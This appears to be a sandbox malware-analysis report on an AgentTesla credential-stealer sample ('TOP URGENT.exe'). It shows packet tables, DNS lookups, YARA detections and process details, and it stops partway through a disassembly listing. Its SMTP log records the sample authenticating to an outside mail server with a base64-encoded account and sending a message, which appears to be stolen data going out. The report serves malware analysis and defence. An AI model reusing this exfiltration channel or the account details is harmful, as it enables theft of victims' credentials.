                                                                                        Sep 15, 2021 16:21:20.087996960 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088011980 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088056087 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088112116 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088134050 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088150024 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088159084 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.088175058 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088249922 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088263035 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088274002 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088288069 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088298082 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088306904 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088345051 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088363886 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088367939 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:21:20.088382006 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088395119 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088426113 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088440895 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088454962 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088494062 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.088545084 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.162904978 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:21:20.163171053 CEST49678443192.168.2.3204.79.197.200
                                                                                        Sep 15, 2021 16:22:11.884412050 CEST804967993.184.221.240192.168.2.3
                                                                                        Sep 15, 2021 16:22:11.887134075 CEST4967980192.168.2.393.184.221.240
                                                                                        Sep 15, 2021 16:22:12.025202036 CEST804968593.184.220.29192.168.2.3
                                                                                        Sep 15, 2021 16:22:12.025355101 CEST4968580192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:22:12.230607986 CEST804968093.184.220.29192.168.2.3
                                                                                        Sep 15, 2021 16:22:12.230798960 CEST4968080192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:22:13.972676992 CEST49692443192.168.2.323.35.237.194
                                                                                        Sep 15, 2021 16:22:13.973058939 CEST4969380192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:23:02.268676996 CEST4968380192.168.2.323.55.161.160
                                                                                        Sep 15, 2021 16:23:02.269232988 CEST49696443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.269351006 CEST49684443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.269519091 CEST49686443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.269521952 CEST49697443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.269678116 CEST4968580192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:23:02.286824942 CEST804968593.184.220.29192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.286956072 CEST4968580192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:23:02.288193941 CEST804968323.55.161.160192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.288337946 CEST4968380192.168.2.323.55.161.160
                                                                                        Sep 15, 2021 16:23:02.296071053 CEST4434968420.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.296262980 CEST4434969620.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.296268940 CEST49684443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.296366930 CEST49696443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.296528101 CEST4434969720.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.296561003 CEST4434968620.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:02.296644926 CEST49697443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:02.296674967 CEST49686443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:13.327773094 CEST804967993.184.221.240192.168.2.3
                                                                                        Sep 15, 2021 16:23:13.327915907 CEST4967980192.168.2.393.184.221.240
                                                                                        Sep 15, 2021 16:23:13.670583963 CEST804968093.184.220.29192.168.2.3
                                                                                        Sep 15, 2021 16:23:13.670836926 CEST4968080192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:23:18.473272085 CEST4434968813.107.5.88192.168.2.3
                                                                                        Sep 15, 2021 16:23:18.854533911 CEST4434968713.107.5.88192.168.2.3
                                                                                        Sep 15, 2021 16:23:25.149704933 CEST804967993.184.221.240192.168.2.3
                                                                                        Sep 15, 2021 16:23:25.149786949 CEST4967980192.168.2.393.184.221.240
                                                                                        Sep 15, 2021 16:23:26.116053104 CEST804968093.184.220.29192.168.2.3
                                                                                        Sep 15, 2021 16:23:26.116247892 CEST4968080192.168.2.393.184.220.29
                                                                                        Sep 15, 2021 16:23:26.841397047 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:26.983742952 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:26.983903885 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.243478060 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.244544983 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.387980938 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.388012886 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.389497042 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.533042908 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.533664942 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.678124905 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.679183006 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.822444916 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.822858095 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:27.972619057 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:27.973043919 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:28.116139889 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:28.117424965 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:28.117691040 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:28.118556023 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:28.118664980 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:28.123406887 CEST44349678204.79.197.200192.168.2.3
                                                                                        Sep 15, 2021 16:23:28.259875059 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:28.260766029 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:28.321346998 CEST58749820208.91.199.225192.168.2.3
                                                                                        Sep 15, 2021 16:23:28.367492914 CEST49820587192.168.2.3208.91.199.225
                                                                                        Sep 15, 2021 16:23:35.508586884 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.508646965 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.508825064 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.509864092 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.509896040 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.607055902 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.607333899 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.607404947 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.607420921 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.607431889 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.632076025 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.632088900 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.632411957 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.635207891 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.635282993 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.635303020 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787429094 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787452936 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787461996 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787506104 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787621021 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.787636995 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.787647963 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.787997007 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.788002968 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:35.791858912 CEST4434982120.190.160.131192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.793246031 CEST49821443192.168.2.320.190.160.131
                                                                                        Sep 15, 2021 16:23:38.655301094 CEST49820587192.168.2.3208.91.199.225

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Sep 15, 2021 16:21:20.096689939 CEST4919953192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:21:20.124217987 CEST53491998.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:21:47.040812016 CEST5062053192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:21:47.074423075 CEST53506208.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:21:51.606087923 CEST6493853192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:21:51.648720980 CEST53649388.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:11.233793020 CEST6015253192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:11.263304949 CEST53601528.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:15.378138065 CEST5754453192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:15.426013947 CEST53575448.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:15.970870018 CEST5598453192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:16.034604073 CEST53559848.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:16.439515114 CEST6418553192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:16.478993893 CEST53641858.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:16.630362034 CEST6511053192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:16.672513962 CEST53651108.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:17.044680119 CEST5836153192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:17.074934006 CEST53583618.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:17.872251034 CEST6349253192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:17.938774109 CEST53634928.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:18.407995939 CEST6083153192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:18.443593979 CEST53608318.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:19.324203968 CEST6010053192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:19.356739998 CEST53601008.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:23.629121065 CEST5319553192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:23.686892986 CEST53531958.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:24.720407963 CEST5014153192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:24.748224974 CEST53501418.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:25.180646896 CEST5302353192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:25.212660074 CEST53530238.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:22:29.705743074 CEST4956353192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:22:29.768616915 CEST53495638.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:07.324898958 CEST5135253192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:07.325835943 CEST5934953192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:07.354120970 CEST53593498.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:07.356059074 CEST53513528.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:10.119277954 CEST5708453192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:10.181714058 CEST53570848.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:12.529038906 CEST5882353192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:12.570007086 CEST53588238.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:26.026834011 CEST5756853192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST53575688.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:26.557805061 CEST5054053192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST53505408.8.8.8192.168.2.3
                                                                                        Sep 15, 2021 16:23:35.858225107 CEST5436653192.168.2.38.8.8.8
                                                                                        Sep 15, 2021 16:23:35.883734941 CEST53543668.8.8.8192.168.2.3

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Sep 15, 2021 16:23:26.026834011 CEST192.168.2.38.8.8.80x5147Standard query (0)smtp.almuntakhaba.comA (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.557805061 CEST192.168.2.38.8.8.80xd737Standard query (0)smtp.almuntakhaba.comA (IP address)IN (0x0001)

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST8.8.8.8192.168.2.30x5147No error (0)smtp.almuntakhaba.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST8.8.8.8192.168.2.30x5147No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST8.8.8.8192.168.2.30x5147No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST8.8.8.8192.168.2.30x5147No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.192635059 CEST8.8.8.8192.168.2.30x5147No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST8.8.8.8192.168.2.30xd737No error (0)smtp.almuntakhaba.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST8.8.8.8192.168.2.30xd737No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST8.8.8.8192.168.2.30xd737No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST8.8.8.8192.168.2.30xd737No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                        Sep 15, 2021 16:23:26.717607021 CEST8.8.8.8192.168.2.30xd737No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)

                                                                                        SMTP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                        Sep 15, 2021 16:23:27.243478060 CEST58749820208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                        Sep 15, 2021 16:23:27.244544983 CEST49820587192.168.2.3208.91.199.225EHLO 928100
                                                                                        Sep 15, 2021 16:23:27.388012886 CEST58749820208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                        250-PIPELINING
                                                                                        250-SIZE 41648128
                                                                                        250-VRFY
                                                                                        250-ETRN
                                                                                        250-STARTTLS
                                                                                        250-AUTH PLAIN LOGIN
                                                                                        250-AUTH=PLAIN LOGIN
                                                                                        250-ENHANCEDSTATUSCODES
                                                                                        250-8BITMIME
                                                                                        250 DSN
                                                                                        Sep 15, 2021 16:23:27.389497042 CEST49820587192.168.2.3208.91.199.225AUTH login cHBjQGFsbXVudGFraGFiYS5jb20=
                                                                                        Sep 15, 2021 16:23:27.533042908 CEST58749820208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                        Sep 15, 2021 16:23:27.678124905 CEST58749820208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                        Sep 15, 2021 16:23:27.679183006 CEST49820587192.168.2.3208.91.199.225MAIL FROM:<ppc@almuntakhaba.com>
                                                                                        Sep 15, 2021 16:23:27.822444916 CEST58749820208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                        Sep 15, 2021 16:23:27.822858095 CEST49820587192.168.2.3208.91.199.225RCPT TO:<ppc@almuntakhaba.com>
                                                                                        Sep 15, 2021 16:23:27.972619057 CEST58749820208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                        Sep 15, 2021 16:23:27.973043919 CEST49820587192.168.2.3208.91.199.225DATA
                                                                                        Sep 15, 2021 16:23:28.116139889 CEST58749820208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                        Sep 15, 2021 16:23:28.118664980 CEST49820587192.168.2.3208.91.199.225.
                                                                                        Sep 15, 2021 16:23:28.321346998 CEST58749820208.91.199.225192.168.2.3250 2.0.0 Ok: queued as DBF7FD96D1

                                                                                        Code Manipulations

                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        Analysis Process: TOP URGENT.exe PID: 6352 Parent PID: 5424

                                                                                        General

                                                                                        Start time:16:21:25
                                                                                        Start date:15/09/2021
                                                                                        Path:C:\Users\user\Desktop\TOP URGENT.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\Desktop\TOP URGENT.exe'
                                                                                        Imagebase:0x9f0000
                                                                                        File size:713216 bytes
                                                                                        MD5 hash:3AF20EE616D2D9C806D27A3C245D4D7B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        Reputation:low

                                                                                        Chronological Activities

                                                                                        Analysis Process: MSBuild.exe PID: 6592 Parent PID: 6352

                                                                                        General

                                                                                        Start time:16:21:35
                                                                                        Start date:15/09/2021
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Imagebase:0x690000
                                                                                        File size:261728 bytes
                                                                                        MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        Reputation:high

                                                                                        Chronological Activities

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                        Reset < >

                                                                                          Analysis Process: TOP URGENT.exe PID: 6352 Parent PID: 5424 TOP URGENT.exeCOMMON

                                                                                          Executed Functions

                                                                                          Function 04D80643, Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-3887548279
                                                                                          • Opcode ID: 814f7453fb1ae141a290024a503d707591e6e2d9ccd7a100c2044196b90fc7d0
                                                                                          • Instruction ID: d3d17b5c96b22a48480ee0b80f34d8272dd0b7acc48b61536bffbc1117f2f875
                                                                                          • Opcode Fuzzy Hash: 814f7453fb1ae141a290024a503d707591e6e2d9ccd7a100c2044196b90fc7d0
                                                                                          • Instruction Fuzzy Hash: B1513771E5122ACFDB64CF65C840BEDB7B2FF89300F1495EAD149A6240E770AAC59F50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D81A10, Relevance: .3, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a8bfd7437df61039b1833953474f5658d873a8a92532f7666f251381b13f608
                                                                                          • Instruction ID: abe108cf957b30509bf44e6967f37b781dab8e46a33eb2b8d0cccca25e9bdba8
                                                                                          • Opcode Fuzzy Hash: 5a8bfd7437df61039b1833953474f5658d873a8a92532f7666f251381b13f608
                                                                                          • Instruction Fuzzy Hash: 09C1B575A006158FCB14EFA9C480ABEBBB2FF85304F15856DD4056B261D731FD4ACBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D80380, Relevance: .2, Instructions: 209COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbaaf0e61c78ee9c0e0ffd38320b47dffb11fdd5b98e7275be6188d670a2a0e9
                                                                                          • Instruction ID: 5e79097ea790282fe60dca5015f053243e5483bb3f0bf2bcca44a81e0423a5a1
                                                                                          • Opcode Fuzzy Hash: fbaaf0e61c78ee9c0e0ffd38320b47dffb11fdd5b98e7275be6188d670a2a0e9
                                                                                          • Instruction Fuzzy Hash: 8F911671E04229CFDB64CF66C844BEDBBB2BB89300F14C5AA954DA6254EB705A85DF40
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D80371, Relevance: .2, Instructions: 183COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8a2816991c36ea8206ea0c9af6728615c1cc411f8a0f29570ed1e81d6cbfca93
                                                                                          • Instruction ID: 746dd76bbd09d649c497898822e790a5302e54f4396748032abd45ab8a6ee4bd
                                                                                          • Opcode Fuzzy Hash: 8a2816991c36ea8206ea0c9af6728615c1cc411f8a0f29570ed1e81d6cbfca93
                                                                                          • Instruction Fuzzy Hash: 33712771E10629CFDB68CF66C844BEDB7B2BF89300F14C5EA9509A7254EB305A86DF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D805F0, Relevance: .2, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43c478db854ca5faacf3b7ec69c046a5e81939a4eaf6ce34eca942db478fccf4
                                                                                          • Instruction ID: 9a53fe0c2da4306610233729c0f47151b185c71966535e2e7d2853e3a60c6b55
                                                                                          • Opcode Fuzzy Hash: 43c478db854ca5faacf3b7ec69c046a5e81939a4eaf6ce34eca942db478fccf4
                                                                                          • Instruction Fuzzy Hash: 3F613770E5122ACFDB64CF65C844BEDB7B2FB89301F1485EAD10AA2250E730AAC5DF10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D80658, Relevance: .1, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f27ea1fe89a890c251508a31380b349391fb84bc854c45d653fa00424131f39
                                                                                          • Instruction ID: 4c9f6bc535ed41a5202777675830dad8025204adf832da9b59432526c5282162
                                                                                          • Opcode Fuzzy Hash: 4f27ea1fe89a890c251508a31380b349391fb84bc854c45d653fa00424131f39
                                                                                          • Instruction Fuzzy Hash: 44613870E5022ACFDB64CF65C844BEDB7B2FB89300F1495EAD109A6250E770AAC59F10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D805D7, Relevance: .1, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dba27f05f762b9317ff82cb5fe75a505b904967aa81336bec5b45731d10fabb4
                                                                                          • Instruction ID: a714171021d877ff7090460813b0a028f3edec7446361f4f3c3d7c7c9a05fc2d
                                                                                          • Opcode Fuzzy Hash: dba27f05f762b9317ff82cb5fe75a505b904967aa81336bec5b45731d10fabb4
                                                                                          • Instruction Fuzzy Hash: B6514871E5022ACFDB64CF65C840BEDB7B2FF89300F1485EAD10AA6250E770AAC59F50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7F030, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08C7F266
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: c9c49d0b6da197c21b71fefe143e1cd0763d60351a971a62c6ee64554c07295f
                                                                                          • Instruction ID: 3dd1cde80a88baead2c652915c1d6da2cc57a5cca3db2891dac6a46f10aa257e
